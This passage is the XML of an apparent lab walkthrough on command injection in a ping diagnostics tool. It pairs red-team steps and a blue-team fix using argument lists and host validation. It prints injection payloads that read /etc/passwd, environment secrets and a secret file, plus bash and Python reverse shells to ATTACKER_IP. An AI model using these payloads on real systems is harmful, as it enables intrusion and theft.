          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Go to Diagnostics and test normal usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Navigate to Diagnostics → Network Diagnostics Tool.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Normal use: enter "10.0.1.10" → server runs: ping -c 3 10.0.1.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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The host parameter is passed directly to shell=True subprocess — no escaping!</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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Inject a second command using semicolon</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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In the Target Host field, enter: 127.0.0.1; whoami</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Select tool: ping and click Execute.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Server runs: ping -c 3 127.0.0.1; whoami 2&gt;&amp;1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Output shows ping result AND the username the server runs as!</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Command injection payloads:
127.0.0.1; whoami              → shows current user
127.0.0.1; id                 → shows UID/GID/groups
127.0.0.1; cat /etc/passwd    → system users
127.0.0.1 &amp;&amp; env              → environment variables (may contain secrets)
127.0.0.1 | ls -la /home/     → list home directories
127.0.0.1; cat /proc/self/environ  → process env with secrets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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Read application source code and secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Inject: 127.0.0.1; cat /home/user/nexuscore/app.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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Full server source code returned — all routes and vulnerability details visible.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Try: 127.0.0.1; cat /home/user/nexuscore/secret.txt for direct secret access.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C0392B" w:sz="1"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="C0392B" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="C0392B" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>
              <w:right w:val="single" w:color="C0392B" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FDEDEC" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="C0392B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Escalate to reverse shell (demonstrate impact)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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For full interactive shell (in real engagements), inject a reverse shell payload:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5"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The server is running as a Linux user — full filesystem access at that user's privilege level.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="C0392B" w:sz="1"/>
              <w:bottom w:val="single" w:color="C0392B" w:sz="1"/>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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C0392B"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Combine with privilege escalation vulnerabilities for root access.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># Reverse shell payload (for real engagements):
127.0.0.1; bash -i &gt;&amp; /dev/tcp/ATTACKER_IP/4444 0&gt;&amp;1
# On attacker machine:
nc -lvnp 4444
# Python reverse shell:
127.0.0.1; python3 -c "import socket,subprocess,os;
s=socket.socket();s.connect(('ATTACKER',4444));
os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);
subprocess.call(['/bin/sh','-i'])"</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4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="14"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="140"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="60" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">🚩  Expected Result / FLAG</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1C2833"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Inject "127.0.0.1; whoami" → see server username. Inject "127.0.0.1; cat /etc/passwd" → read system users. Inject "127.0.0.1; cat secret.txt" → capture master key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="100" w:after="100" w:line="276"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="1A7A4A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🔵  BLUE TEAM — DEFENCE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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A4A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="90"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="90"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP
1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E9F7EF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="120" w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:i w:val="false"/>
                <w:iCs w:val="false"/>
                <w:color w:val="1A7A4A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Never use shell=True with user input — use argument list</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="single" w:color="1A7A4A"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="C8D6E5" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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The root cause: subprocess.run(cmd, shell=True) passes command to /bin/sh.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="760"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8600"/>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="single" w:color="1A7A4A" w:sz="1"/>
              <w:right w:val="single" w:color="1A7A4A"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Fix: pass a list of arguments instead — shell metacharacters (;, &amp;&amp;, |, $) are not interpreted.</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3F55" w:sz="1"/>
              <w:left w:val="single" w:color="5DADE2" w:sz="14"/>
              <w:bottom w:val="single" w:color="2A3F55" w:sz="1"/>
              <w:right w:val="single" w:color="2A3F55" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="161F2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="160"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="300"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="85C1E9"/>
                <w:sz w:val="17"/>
                <w:szCs w:val="17"/>
              </w:rPr>
              <w:t xml:space="preserve"># VULNERABLE:
cmd = f"ping -c 3 {host} 2&gt;&amp;1"  # host = "127.0.0.1; whoami"
result = subprocess.run(cmd, shell=True, ...)  # shell expands ; as cmd separator!
# FIXED — argument list, no shell:
import shlex, re
def sanitise_host(host):
    # Allow only: alphanumeric, dots, hyphens
    if not re.match(r'^[a-zA-Z0-9.\-]+$', host):
        raise ValueError("Invalid host")
    return host
host_clean = sanitise_host(host)
result = subprocess.run(
    ["ping", "-c", "3", host_clean],  # list — no shell expansion
    capture_output=True, text=True, timeout=10
    # shell=False is the DEFAULT — never set shell=True with user input!
)</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1A7A4A" w:sz="1"/>
              <w:left w:val="single" w:color="1A7A4A" w:sz="1"/>
